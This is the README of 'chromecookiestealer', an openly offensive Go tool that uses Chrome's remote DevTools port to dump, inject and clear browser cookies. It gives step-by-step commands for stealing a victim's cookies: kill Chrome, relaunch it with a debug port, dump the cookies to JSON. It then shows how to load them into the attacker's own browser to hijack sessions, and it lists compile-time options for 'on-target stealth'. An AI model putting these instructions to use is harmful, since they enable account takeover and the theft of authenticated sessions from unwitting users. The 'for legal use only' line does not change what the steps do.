Chromecookiestealer - Steal/Inject Chrome Cookies Over The DevTools Protocol
Attaches to Chrome using its Remote DevTools protocol and steals/injects/clears/deletes cookies.
Heavily inspired by WhiteChocolateMacademiaNut.
Cookies are dumped as JSON objects using Chrome's own format. The same format is used for cookies to be loaded.
For legal use only.
- Dump Chrome's cookies
- Inject dumped Cookies into (another instance of) Chrome
- Clear Chrome's cookies
- Defaults settable at compile time
Steal a victim's cookies:
git clone
cd chromecookiestealer
go build
pkill Chrome
/Applications/Google\\ Chrome --remote-debugging-port=9222 --restore-last-session # Varies by target
./chromecookiestealer -dump ./cookies.json
Inject into the attacker's local browser:
# Start Chrome with a debug port, as above.
./chromecookiestealer -clear -inject ./cookies.json
Usage: chromecookiestealer [options]
Attaches to Chrome using the Remote DevTools Protocol (--remote-debugging-port)
and, in order and as requested:
- Dumps cookies
- Clears cookies
- Injects cookies
- Deletes selected cookies
Parameters for cookies to be deleted should be represented as an array of JSON
objects with the following string fields:
name - Name of the cookies to remove.
url - If specified, deletes all the cookies with the given name where domain
and path match provided URL.
domain - If specified, deletes only cookies with the exact domain.
path - If specified, deletes only cookies with the exact path.
Filenames may also be "-" for stdin/stdout.
-chrome URL
Chrome remote debugging URL (default "ws://")
C lear browser cookies
-delete file
Name of file containing parameters for cookies to delete
-dump file
Name of file to which to dump stolen cookies
-inject file
Name of file containing cookies to inject
Don't print a summary on exit
Enable verbose logging
go build
should be all that's necessary. The following may be set at compile time with -ldflags '-X main.Foo=bar'
for a touch more on-target stealth.
Variable | Description |
DumpFile | Name of a file to which to dump cookies. Implies -dump |
InjectFile | Name of a file from which to inject cookies. Implies -inject |
DeleteFile | Name of a file with parameters describing cookies to delete. Implies -delete |
DoClear | If set to any value, implies -clear |
None of the above are set by default.
The Chrome DevTools Protocol is a bit of a moving target. It may be necessary to use a newer version of the chromedp and cdproto libraries should this program stop working. This can be done with
go get -u -v all
go mod tidy
go build
which could well have the side-effect of breaking everything else.